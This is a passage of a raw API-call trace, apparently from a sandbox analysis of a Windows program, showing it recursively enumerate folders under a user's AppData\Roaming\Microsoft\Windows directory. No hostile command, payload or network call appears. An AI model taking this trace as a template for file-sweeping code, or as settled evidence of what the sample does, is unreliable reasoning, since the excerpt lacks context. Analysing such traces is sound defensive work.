onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*" [0057.307] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.307] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.307] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.307] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="AccountPictures" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures" [0057.307] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*" [0057.307] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.308] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.308] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.308] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.308] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.308] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.308] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.308] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0057.308] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0057.308] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07558 [0057.310] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.310] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.310] PathMatchSpecW (pszFile="CameraRoll.library-ms", pszSpec="*") returned 1 [0057.310] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.310] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.310] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.310] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0057.310] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.310] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0057.310] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.310] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0057.311] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.311] PathMatchSpecW (pszFile="SavedPictures.library-ms", pszSpec="*") returned 1 [0057.311] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.311] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0057.311] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.311] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.312] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.312] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0057.312] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0057.312] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07318 [0057.312] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.313] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.313] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.313] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.313] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0057.313] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0057.313] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.313] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.314] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.314] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.314] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.314] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0057.314] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0057.314] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07498 [0057.314] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.315] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.315] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0057.315] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0057.315] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.315] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.315] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.315] PathMatchSpecW (pszFile="5f7b5f1e01b83767.automaticDestinations-ms", pszSpec="*") returned 1 [0057.315] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.315] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0057.316] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.316] PathMatchSpecW (pszFile="9d1f905ce5044aee.automaticDestinations-ms", pszSpec="*") returned 1 [0057.316] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.316] PathMatchSpecW (pszFile="f01b4d95cf55d32a.automaticDestinations-ms", pszSpec="*") returned 1 [0057.316] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.316] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.316] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.316] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0057.316] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0057.316] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb071d8 [0057.317] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.317] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.317] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0057.317] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.317] PathMatchSpecW (pszFile="f01b4d95cf55d32a.customDestinations-ms", pszSpec="*") returned 1 [0057.317] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.317] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.317] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.318] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.318] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.318] PathMatchSpecW (pszFile="http--www.google.com-.lnk", pszSpec="*") returned 1 [0057.318] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.318] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0057.318] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.318] PathMatchSpecW (pszFile="Mozilla Maintenance Service.lnk", pszSpec="*") returned 1 [0057.318] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.318] PathMatchSpecW (pszFile="Program Files (x86).lnk", pszSpec="*") returned 1 [0057.318] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.318] PathMatchSpecW (pszFile="System and Security.lnk", pszSpec="*") returned 1 [0057.318] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.319] PathMatchSpecW (pszFile="System.lnk", pszSpec="*") returned 1 [0057.319] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.319] PathMatchSpecW (pszFile="The Internet.lnk", pszSpec="*") returned 1 [0057.319] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.319] FindClose (in: hFindFile=0xb07498 | out: hFindFile=0xb07498) returned 1 [0057.319] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.319] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0057.319] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0057.319] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.320] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.321] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.321] PathMatchSpecW (pszFile="Compressed (zipped) Folder.ZFSendToTarget", pszSpec="*") returned 1 [0057.321] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.321] PathMatchSpecW (pszFile="Desktop (create shortcut).DeskLink", pszSpec="*") returned 1 [0057.321] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.321] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.321] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.321] PathMatchSpecW (pszFile="Documents.mydocs", pszSpec="*") returned 1 [0057.321] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.322] PathMatchSpecW (pszFile="Fax Recipient.lnk", pszSpec="*") returned 1 [0057.322] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.322] PathMatchSpecW (pszFile="Mail Recipient.MAPIMail", pszSpec="*") returned 1 [0057.322] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.322] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.323] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.323] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0057.323] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0057.323] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.324] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.324] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.324] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.324] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.324] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0057.324] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0057.324] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0057.325] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.325] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.325] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessibility" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility" [0057.325] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*" [0057.325] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07418 [0057.325] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.326] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.326] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.326] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.326] PathMatchSpecW (pszFile="Magnify.lnk", pszSpec="*") returned 1 [0057.326] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.326] PathMatchSpecW (pszFile="Narrator.lnk", pszSpec="*") returned 1 [0057.326] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.326] PathMatchSpecW (pszFile="On-Screen Keyboard.lnk", pszSpec="*") returned 1 [0057.326] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.326] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.327] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.327] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0057.327] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0057.327] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb072d8 [0057.327] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.327] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.327] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.328] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.328] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0057.328] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.328] PathMatchSpecW (pszFile="Notepad.lnk", pszSpec="*") returned 1 [0057.328] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.328] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.328] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.328] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0057.328] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0057.329] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", 